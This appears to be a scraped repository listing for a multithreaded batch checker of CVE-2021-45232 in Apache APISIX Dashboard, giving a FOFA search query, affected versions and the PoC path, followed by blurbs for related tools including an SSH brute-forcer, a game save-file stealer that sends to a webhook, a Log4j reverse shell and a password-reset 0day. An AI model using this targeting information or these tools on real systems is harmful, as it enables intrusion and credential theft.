CVE-2021-45232-RCE
CVE-2021-45232-RCE-多线程批量漏洞检测
FOFA 查询
title="Apache APISIX Dashboard"
影响范围
Apache APISIX Dashboard < 2.10.1
POC:
IP:PORT/apisix/admin/migrate/export
如有帮助,请大佬帮忙点个星星再走,谢谢!
批量漏洞检测
依赖问题自己解决,不懂百度。一般模块报错的话,自己安装对应依赖
编写与检测 
CVE-2021-45232-RCE-多线程批量漏洞检测
Overview
Owner
孤桜懶契
只有忍受过低谷的人,才能踏足山巅
____________________________________________博客:https://gylq.gitee.io/
A simple multi-threaded distributed SSH brute-forcing tool written in Python.
OrbitalDump A simple multi-threaded distributed SSH brute-forcing tool written in Python. How it Works When the script is executed without the --proxi
408 Jan 03, 2023
Yet another web fuzzer
yafuzz Yet another web fuzzer Usage This script can run in two modes of operation. Supplying a wordlist -W argument will initiate a multithreaded fuzz
5 Feb 02, 2022
CVE-2021-41773 Path Traversal for Apache 2.4.49
CVE-2021-41773 Path Traversal for Apache 2.4.49
3 Oct 20, 2021
Now patched 0day for force reseting an accounts password
Animal Jam 0day No-Auth Force Password Reset via API Now patched 0day for force reseting an accounts password Used until patched to cause anarchy. Pro
10 Nov 17, 2022
This is a repository filled with scripts that were made with Python, and designed to exploit computer systems.
PYTHON-EXPLOITATION This is a repository filled with scripts that were made with Python, and designed to exploit computer systems. Networking tcp_clin
1 Oct 30, 2021
log4j burp scanner
log4jscanner log4j burp插件 特点如下: 0x01 基于Cookie字段、XFF头字段、UA头字段发送payload 0x02 基于域名的唯一性,将host带入dnslog中 插件主要识别五种形式: 1.get请求,a=1&b=2&c=3 2.post请求,a=1&b=2&c=
1 Jun 30, 2022
Providing DevOps and security teams script to identify cloud workloads that may be vulnerable to the Log4j vulnerability(CVE-2021-44228) in their AWS account.
We are providing DevOps and security teams script to identify cloud workloads that may be vulnerable to the Log4j vulnerability(CVE-2021-44228) in their AWS account. The script enables security teams
13 Jan 04, 2022
NS-LOOKUP - A python script for scanning website for getting ip address of a website
NS-LOOKUP A python script for scanning website for getting ip address of a websi
5 Aug 02, 2022
log4j2 passive burp rce scanning tool get post cookie full parameter recognition
log4j2_burp_scan 自用脚本log4j2 被动 burp rce扫描工具 get post cookie 全参数识别,在ceye.io api速率限制下,最大线程扫描每一个参数,记录过滤已检测地址,重复地址 token替换为你自己的http://ceye.io/ token 和域名地址
5 Dec 10, 2021
A toolkit for web reconnaissance, it's fast and easy to use.
A toolkit for web reconnaissance, it's fast and easy to use. File Structure httpsuite/ main.py init.py db/ db.py init.py subdomains_db directories_db
22 Jul 22, 2022
How to exploit a double free vulnerability in 2021. 'Use-After-Free for Dummies'
This bug doesn’t exist on x86: Exploiting an ARM-only race condition How to exploit a double free and get a shell. "Use-After-Free for dummies" In thi
1.2k Dec 25, 2022
A piece of software that shows a traceroute of a URL redirect path
Tracing URL redirects has never been easier! Usage • Download 🚩 Use Cases To see where an affiliate link ends up To see what affiliate network is bei
41 Nov 22, 2022
Natas teaches the basics of serverside web-security.
over-the-wire-natas Natas teaches the basics of serverside web-security. Each level of natas consists of its own website located at http://natasX.nata
1 Nov 27, 2021
Metasploit Multi Purpose Exploiting Toolkit For Termux
MSF-EXPLOIT MSF-ANDRO is a Metasploit Multi Purpose Exploiting Toolkit For Termux . Only a Basic Script , Still in Development . FEATURES : Install Me
22 Dec 29, 2022
A Python replicated exploit for Webmin 1.580 /file/show.cgi Remote Code Execution
CVE-2012-2982 John Hammond | September 4th, 2021 Checking searchsploit for Webmin 1.580 I only saw a Metasploit module for the /file/show.cgi Remote C
25 Dec 08, 2022
🍉一款基于Python-Django的多功能Web安全渗透测试工具,包含漏洞扫描,端口扫描,指纹识别,目录扫描,旁站扫描,域名扫描等功能。
Sec-Tools 项目介绍 系统简介 本项目命名为Sec-Tools,是一款基于 Python-Django 的在线多功能 Web 应用渗透测试系统,包含漏洞检测、目录识别、端口扫描、指纹识别、域名探测、旁站探测、信息泄露检测等功能。本系统通过旁站探测和域名探测功能对待检测网站进行资产收集,通过端
300 Jan 07, 2023
Bypass 4xx HTTP response status codes.
Forbidden Bypass 4xx HTTP response status codes. To see all the test cases, check the source code - follow the NOTE comments. Script uses multithreadi
165 Dec 28, 2022
Growtopia Save.dat Stealer
savedat-stealer Growtopia Save.dat Stealer (Auto Send To Webhook) How To Use After Change Webhook URL Compile script to exe Give to target Done Info C
9 May 01, 2022
Log4j2 CVE-2021-44228 revshell
Log4j2-CVE-2021-44228-revshell Usage For reverse shell: $~ python3 Log4j2-revshell.py -M rev -u http://www.victimLog4j.xyz:8080 -l [AttackerIP] -p [At
16 Mar 24, 2022
Oh365UserFinder is used for identifying valid o365 accounts without the risk of account lockouts.
Oh365 User Finder Oh365UserFinder is used for identifying valid o365 accounts without the risk of account lockouts. The tool parses responses to ident
414 Jan 02, 2023